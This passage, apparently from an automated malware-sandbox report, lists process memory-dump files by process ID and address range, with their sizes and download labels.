
Filesize
480KB

Download
memory/2008-248-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/2008-255-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/2128-268-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2128-266-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2128-267-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2128-258-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2128-265-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2128-260-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2192-200-0x0000000069D90000-0x000000006A33B000-memory.dmp

Filesize
5.7MB

Download
memory/2192-203-0x0000000002B50000-0x0000000002B90000-memory.dmp

Filesize
256KB

Download
memory/2192-202-0x0000000069D90000-0x000000006A33B000-memory.dmp

Filesize
5.7MB

Download
memory/2192-206-0x0000000069D90000-0x000000006A33B000-memory.dmp

Filesize
5.7MB

Download
memory/2192-201-0x0000000002B50000-0x0000000002B90000-memory.dmp

Filesize
256KB

Download
memory/2452-314-0x00000000722FD000-0x0000000072308000-memory.dmp

Filesize
44KB

Download
memory/2452-1-0x00000000722FD000-0x0000000072308000-memory.dmp

Filesize
44KB

Download
memory/2452-8-0x0000000000560000-0x0000000000562000-memory.dmp

Filesize
8KB

Download
memory/2452-193-0x00000000722FD000-0x0000000072308000-memory.dmp

Filesize
44KB

Download
memory/2452-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2492-220-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2492-212-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2492-236-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2492-235-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2492-229-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2492-234-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2492-224-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2492-233-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2492-222-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

Filesize
4KB

Download
memory/2492-226-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2492-218-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2492-231-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2492-216-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2492-230-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2492-214-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2492-238-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2492-210-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2492-209-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2492-285-0x0000000010000000-0x0000000010019000-memory.dmp

Filesize
100KB

Download
memory/2492-208-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2492-275-0x0000000010000000-0x0000000010019000-memory.dmp

Filesize
100KB

Download
memory/2492-279-0x0000000010000000-0x0000000010019000-memory.dmp

Filesize
100KB

Download
memory/2492-278-0x0000000010000000-0x0000000010019000-memory.dmp

Filesize
100KB

Download
memory/2492-280-0x0000000010000000-0x0000000010019000-memory.dmp

Filesize
100KB

Download
memory/2596-3-0x000000002F991000-0x000000002F992000-memory.dmp

Filesize
4KB

Download
memory/2596-5-0x00000000722FD000-0x0000000072308000-memory.dmp

Filesize
44KB

Download
memory/2596-7-0x00000000044D0000-0x00000000044D2000-memory.dmp

Filesize
8KB

Download
memory/2596-310-0x00000000722FD000-0x0000000072308000-memory.dmp

Filesize
44KB

Download
memory/2596-194-0x00000000722FD000-0x0000000072308000-memory.dmp

Filesize
44KB

Download